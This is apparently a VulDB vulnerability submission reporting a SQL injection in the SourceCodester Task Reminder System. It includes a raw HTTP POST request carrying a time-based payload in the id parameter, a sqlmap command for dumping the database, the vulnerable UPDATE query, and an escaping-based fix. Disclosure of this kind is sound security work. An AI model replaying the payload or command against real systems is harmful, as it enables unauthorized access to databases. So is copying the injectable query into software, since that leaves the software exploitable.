Invia #228616: SourceCodester Task Management System POST sql injection informazioni

Titolo	SourceCodester Task Management System POST sql injection
Descrizione	I find a SQL injection vulnerability in the SourceCodester Task Management System(https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html) This affect the file /php-trs/classes/Master.php?f=save_reminder: POST /php-trs/classes/Master.php?f=save_reminder HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 103 Origin: http://localhost Connection: close Referer: http://localhost/php-trs/admin/?page=reminders/manage_reminder&id=6 Cookie: ajs_anonymous_id=b6bc95f0-ab68-41ad-85fc-5a73232f365a; ajs_user_id=048546bfc1e19205a55a5993547bc9308acf5a9c; PHPSESSID=v50trgss5tkq84rfr78hjj7g1h Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin user_id=1&title=1&description=1&remind_from=0011-01-01&remind_to=0222-01-01&status=1&id=1'and sleep(4)# Then you can save the request package as 1.txt, and then use sqlmap to inject it. The command is "sqlmap -r 1.txt --data="id=1", and then you can successfully drag the library The vulnerability in the code "UPDATE `reminder_list` set {data} where id = '{id}'" arises from not implementing proper filtering on the controllable parameter id. This lack of filtering makes the code susceptible to SQL injection attacks. To prevent such attacks, it is recommended to use mysqli_real_escape_string() to protect the id parameter against malicious exploitation. By doing so, the code will be more secure and less prone to SQL injection vulnerabilities.
Fonte	⚠️ https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html
Utente	fushuling (UID 45488)
Sottomissione	26/10/2023 19:07 (3 anni fa)
Moderazione	26/10/2023 20:21 (1 hour later)
Stato	Accettato
Voce VulDB	243645 [SourceCodester Task Reminder System 1.0 Master.php?f=save_reminder ID iniezione SQL]
Punti	20

◂ Precedente Visione D'ensemble Il prossimo ▸

Interested in the pricing of exploits?

See the underground prices here!